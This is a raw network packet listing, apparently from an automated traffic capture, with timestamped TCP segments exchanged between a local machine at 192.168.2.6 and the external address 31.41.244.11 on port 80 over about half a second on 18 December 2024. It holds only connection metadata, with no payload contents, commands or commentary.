                                                                                                                                                              Dec 18, 2024 11:47:29.837924957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.837939024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.837974072 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.837997913 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.838644028 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.838655949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.838700056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.838753939 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.838824987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.839445114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.839457035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.839471102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.839513063 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.839513063 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.840260983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.840282917 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.840296030 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.840306997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.840328932 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.841032028 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841044903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841058969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841074944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.841098070 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.841820955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841834068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841846943 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.841876030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.841895103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.842612982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.842628002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.842679977 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.842716932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.842822075 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.843444109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.843460083 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.843493938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.843518972 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.843656063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.843750954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.844227076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.844265938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.844266891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.844281912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.844317913 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.844341993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.845232010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.845288992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.008843899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.008899927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.008912086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.008915901 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.008934021 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.008970976 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.009325027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.009339094 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.009366989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.009368896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.009383917 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.009402037 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.010061979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.010112047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.010135889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.010148048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.010170937 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.010186911 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.011039019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011050940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011063099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011092901 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.011137009 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.011728048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011738062 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011780024 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.011981010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.011993885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.012006044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.012025118 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.012048006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.012989044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.012999058 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.013017893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.013025045 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.013041019 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.013061047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.013622999 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.013634920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.013647079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.013674974 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.013699055 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.014374018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.014406919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.014417887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.014420986 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.014446020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.014468908 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.015214920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.015235901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.015248060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.015258074 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.015276909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.016220093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016278982 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.016283989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016295910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016350031 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.016819000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016860008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016864061 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.016871929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.016902924 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.016925097 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.017600060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.017612934 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.017626047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.017651081 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.017666101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.018470049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.018505096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.018516064 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.018517017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.018548965 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.019203901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.019229889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.019246101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.019269943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.019269943 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.019304991 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.019993067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.020015001 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.020025969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.020035028 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.020046949 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.020071030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021003008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021048069 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021150112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021169901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021200895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021225929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021615982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021661043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021882057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021893024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.021929026 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.021939993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.022491932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.022504091 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.022543907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.022610903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.022649050 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.023194075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.023206949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.023240089 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.023255110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.023257971 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.023300886 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.024120092 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.024131060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.024142027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.024163008 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.024199963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.024939060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.024990082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.025021076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.025032043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.025060892 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.025079966 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.025612116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.025641918 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.025655985 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.025679111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.025729895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.025852919 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.026559114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.026571989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.026583910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.026604891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.026629925 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.027347088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.027368069 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.027379990 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.027386904 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.027401924 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.027421951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.028085947 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.028135061 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.028151035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.028163910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.028193951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.028217077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.028857946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.028898954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.028943062 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.028955936 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.029189110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.029659033 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.029701948 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.029726028 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.029736996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.029762983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.029776096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.030531883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.030580044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.030606031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.030617952 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.030644894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.030672073 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.031300068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.031352997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.031357050 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.031369925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.031398058 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.031415939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.032083988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.032094955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.032108068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.032135963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.032172918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.032936096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.032988071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.033091068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.033102036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.033143997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.033679008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.033725977 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.033795118 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.033807993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.033832073 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.033849955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.034504890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.034553051 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.034565926 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.034588099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.034590960 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.034629107 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.035329103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.035340071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.035376072 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.035399914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.035439014 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.036201000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.036215067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.036248922 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.036261082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.036402941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.036442995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.210947037 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211013079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.211038113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211057901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211086035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.211138964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.211333990 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211345911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211355925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.211374998 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.211405993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.212179899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212192059 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212203026 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212238073 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.212270021 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.212625027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212636948 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212654114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.212677956 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.212683916 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.213496923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213506937 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213519096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213536024 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.213555098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.213963985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213977098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213988066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.213999987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.214032888 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.216130972 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.216144085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.216156006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.216192007 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.216245890 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.216777086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.216790915 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.216831923 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.217006922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.217084885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.217216015 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.217227936 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.217241049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.217259884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.217281103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.218096972 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.218107939 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.218120098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.218151093 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.218168974 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.218208075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.218220949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.218244076 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.218266010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.218972921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.219022989 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:30.219074965 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:30.219086885 CET804983731.41.244.11192.168.2.6
